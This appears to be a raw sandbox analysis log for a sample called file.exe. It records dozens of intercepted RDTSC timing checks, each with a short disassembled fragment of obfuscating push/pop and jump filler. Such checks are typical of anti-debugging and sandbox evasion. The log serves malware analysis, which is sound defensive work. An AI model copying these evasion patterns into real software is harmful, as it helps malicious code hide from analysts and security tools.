                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FF6 second address: D47066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F0D344F4AB8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edx, dword ptr [ebp+122D3594h] 0x00000028 mov ebx, dword ptr [ebp+12478038h] 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F0D344F4AB8h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D1800h], ebx 0x0000004e add eax, ebx 0x00000050 mov cx, dx 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F0D344F4ABAh 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47066 second address: D47079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47079 second address: D47083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0D344F4AB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FBC3 second address: D9FBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FBC9 second address: D9FBFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0D344F4AC0h 0x0000000f jl 00007F0D344F4AB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FDB4 second address: D9FDD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70906h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5972 second address: DA5978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5978 second address: DA597E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA597E second address: DA5982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4D0F second address: DA4D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0D34B708F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4E5B second address: DA4E61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4E61 second address: DA4E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4E67 second address: DA4E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4E6B second address: DA4E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4E71 second address: DA4E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4E80 second address: DA4ECD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FDh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F0D34B70903h 0x00000011 jmp 00007F0D34B708FCh 0x00000016 jg 00007F0D34B708F6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0D34B70901h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5554 second address: DA555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC25E second address: DAC279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70907h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC521 second address: DAC527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC527 second address: DAC52D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC52D second address: DAC549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0D344F4AC4h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD62E second address: DAD637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADC03 second address: DADC19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D344F4AC2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADC19 second address: DADC1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5F59 second address: DB5F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5F5D second address: DB5F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5F6B second address: DB5F9C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D344F4AD7h 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F0D344F4AB6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB62B4 second address: DB62BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6579 second address: DB6597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6597 second address: DB659F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB69E8 second address: DB6A09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC0h 0x00000007 je 00007F0D344F4AB8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6A09 second address: DB6A18 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F0D34B708F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6BA7 second address: DB6BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D344F4ABAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6BB5 second address: DB6BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D34B708FAh 0x00000008 jc 00007F0D34B708F6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jno 00007F0D34B7090Bh 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007F0D34B708F6h 0x00000022 jmp 00007F0D34B708FBh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6BFC second address: DB6C18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F0D344F4AC1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6C18 second address: DB6C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1E44 second address: DC1E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1E4A second address: DC1E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1E4E second address: DC1E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jng 00007F0D344F4ABAh 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1E66 second address: DC1E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1E6A second address: DC1E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D344F4AC0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1E84 second address: DC1E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1E88 second address: DC1E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1E8C second address: DC1E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0D34B708F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1E9C second address: DC1EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1EA2 second address: DC1EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC03F3 second address: DC041B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F0D344F4AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jns 00007F0D344F4AB6h 0x00000017 pop edx 0x00000018 jmp 00007F0D344F4ABDh 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC041B second address: DC0423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0593 second address: DC059D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0D344F4AB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0703 second address: DC074D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0D34B70906h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jnl 00007F0D34B708F6h 0x00000019 jbe 00007F0D34B708F6h 0x0000001f popad 0x00000020 push ebx 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F0D34B70905h 0x00000028 pop ebx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0897 second address: DC08A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F0D344F4ABCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC08A4 second address: DC08B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F0D34B708F6h 0x0000000c js 00007F0D34B708F6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC08B6 second address: DC08CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0D344F4ABCh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC08CF second address: DC08D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC08D5 second address: DC08D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1D18 second address: DC1D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFAE9 second address: DBFAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFAED second address: DBFB0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F0D34B70909h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFB0C second address: DBFB31 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D344F4ABEh 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F0D344F4AB6h 0x00000010 jc 00007F0D344F4ABEh 0x00000016 jno 00007F0D344F4AB6h 0x0000001c pushad 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFB31 second address: DBFB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFB39 second address: DBFB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC41B4 second address: DC41BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC41BA second address: DC41C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA3E0 second address: DCA401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 jmp 00007F0D34B70909h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA401 second address: DCA406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA406 second address: DCA40B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA40B second address: DCA420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0D344F4AB6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F0D344F4AB6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD7C82 second address: DD7C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD7C8B second address: DD7C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD7C8F second address: DD7C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC18A second address: DDC1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0D344F4AB6h 0x0000000a jmp 00007F0D344F4AC7h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC1B0 second address: DDC1BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC1BD second address: DDC1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC1C1 second address: DDC1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0D34B70907h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE930E second address: DE9314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB0E5 second address: DEB105 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F0D34B70902h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB105 second address: DEB110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0D344F4AB6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB110 second address: DEB11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0D34B708F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB11A second address: DEB120 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED8BC second address: DED8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0D34B708F8h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED8CC second address: DED8E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC8h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4396 second address: DF439A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF463D second address: DF4642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4642 second address: DF465B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D34B70902h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4AA1 second address: DF4AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF72B8 second address: DF72D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F0D34B708F6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFB000 second address: DFB03A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D344F4ABEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0D344F4ABFh 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jns 00007F0D344F4AB6h 0x00000019 jns 00007F0D344F4AB6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jng 00007F0D344F4AB6h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFAD5B second address: DFAD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17B34 second address: E17B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0D344F4AB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17B3E second address: E17B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70904h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F0D34B708F6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E277B3 second address: E277E9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D344F4AB6h 0x00000008 jmp 00007F0D344F4AC5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0D344F4AC4h 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E27DE9 second address: E27E10 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F0D34B70911h 0x00000010 jmp 00007F0D34B70905h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E29C4A second address: E29C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0D344F4AE2h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E29C84 second address: E29C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C7E3 second address: E2C813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F0D344F4ACDh 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
